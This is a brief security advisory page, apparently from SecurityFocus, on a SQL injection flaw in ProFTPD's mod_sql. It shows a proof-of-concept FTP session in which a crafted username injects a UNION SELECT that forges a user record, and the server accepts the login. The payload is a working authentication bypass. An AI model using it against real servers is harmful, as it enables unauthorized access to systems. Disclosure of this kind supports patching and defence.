ProFTPD SQL Injection mod_sql Vulnerability

The following proof of concept and exploit was provided:

Name (localhost:runlevel): ')UNION SELECT
'u','p',1001,1001,'/tmp','/bin/bash' WHERE(''='
331 Password required for ')UNION.
Password:
230 User ')UNION SELECT 'u','p',1001,1001,'/tmp'
,'/bin/bash' WHERE(''=' logged in.


 

Privacy Statement
Copyright 2010, SecurityFocus